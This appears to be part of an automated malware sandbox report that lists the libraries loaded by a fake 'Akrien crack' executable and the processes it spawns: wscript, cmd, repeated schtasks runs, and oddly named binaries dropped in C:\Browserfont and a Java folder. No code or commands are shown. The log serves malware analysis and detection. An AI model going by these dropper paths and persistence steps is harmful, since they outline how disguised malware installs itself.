            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: glu32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: appxdeploymentclient.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: dinput8.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: hid.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: inputhost.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: dxgidebug.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: mscoree.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: apphelp.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: kernel.appcore.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: version.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: uxtheme.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: windows.storage.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: wldp.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: profapi.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: cryptsp.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: rsaenh.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: cryptbase.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: sspicli.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: ntmarta.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: wbemcomn.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: amsi.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: userenv.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: propsys.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: dlnashext.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: wpdshext.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: edputil.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: urlmon.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: iertutil.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: srvcli.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: netutils.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: wintypes.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: appresolver.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: bcp47langs.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: slc.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: sppc.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Browserfont\refdhcp.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: mscoree.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: apphelp.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: mscoree.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: rasapi32.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: rasman.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: rtutils.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: winhttp.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: dhcpcsvc.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: winnsi.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: wbemcomn.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: amsi.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: userenv.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: winmm.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: winmmbase.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: mmdevapi.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: devobj.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: ksuser.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: avrt.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: audioses.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: powrprof.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: umpdc.dll
